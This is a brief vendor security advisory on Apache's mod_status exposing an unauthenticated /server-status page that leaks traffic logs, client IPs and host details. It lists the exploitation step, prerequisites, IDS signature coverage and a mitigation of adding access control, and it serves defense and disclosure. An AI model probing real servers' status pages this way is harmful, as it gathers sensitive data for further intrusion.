The Apache webserver module mod_status provides information on an Apache server's activity and performance. The module uses a publicly accessible webpage located at /server-status to provide real-time traffic logs in addition to host information including CPU usage, current HTTP requests, client IP addresses, requested paths, and processed virtual hosts. Such information could give a potential attacker information to aid further attacks and could disclose sensitive traffic information. No authentication is required to exploit this information disclosure vulnerability.
Exploitation
Stages
- The attacker makes an HTTP GET request to ‘http ://<host>/server-status’.
- The webserver responds with the mod_status server-status page, providing sensitive host information and access logs.
Prerequisites
The public-facing host is running Apache and mod_status. The mod_status serving/server-status page has no access control (the default, when enabled, is for access control to be off).
Alert Logic Coverage
Alert Logic® has evaluated its customer base for exposure to the exploit and has developed signatures for mitigating the threat depending on the security service in place.
The Network-Based Intrusion Detection System (IDS) has been updated with the new signatures for this exploit when detected via Alert Logic Threat Manager™. If this signature is detected, an incident is generated in the Alert Logic console.
Recommendations for Mitigation
Establish access control for mod_status.
Comments
0 comments
Please sign in to leave a comment.